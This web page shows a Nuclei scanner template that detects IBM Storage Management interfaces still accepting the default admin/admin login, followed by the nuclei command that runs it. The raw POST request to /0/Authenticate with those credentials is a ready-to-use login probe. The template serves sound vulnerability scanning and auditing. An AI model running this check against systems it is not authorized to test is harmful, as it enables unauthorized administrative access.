Skip to content

IBM Storage Management Default Login

ID: ibm-storage-default-login

Severity: high

Author: madrobot

Tags: default-login,ibm,storage

IBM Storage Management default admin login credentials were discovered.

id: ibm-storage-default-login
info:
name: IBM Storage Management Default Login
author: madrobot
severity: high
description: IBM Storage Management default admin login credentials were discovered.
reference:
- https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: default-login,ibm,storage
http:
- raw:
- |
POST /0/Authenticate HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}&continue=&submit=submit+form
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- "/0/Console"
- "Property of IBM"
condition: and
part: body
- type: word
words:
- "JSESSIONID"
part: header
- type: status
status:
- 200
# digest: 4b0a00483046022100b86bd769beea403f9b4dfdecb84a76819a0d62ed551599c078ad8a5e8a3e4427022100fdd0568f0280baa5723c86a6dedab40b6c51cc37f6b3b88407cc31c203a88f49:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/ibm/ibm-storage-default-credential.yaml"

View on Github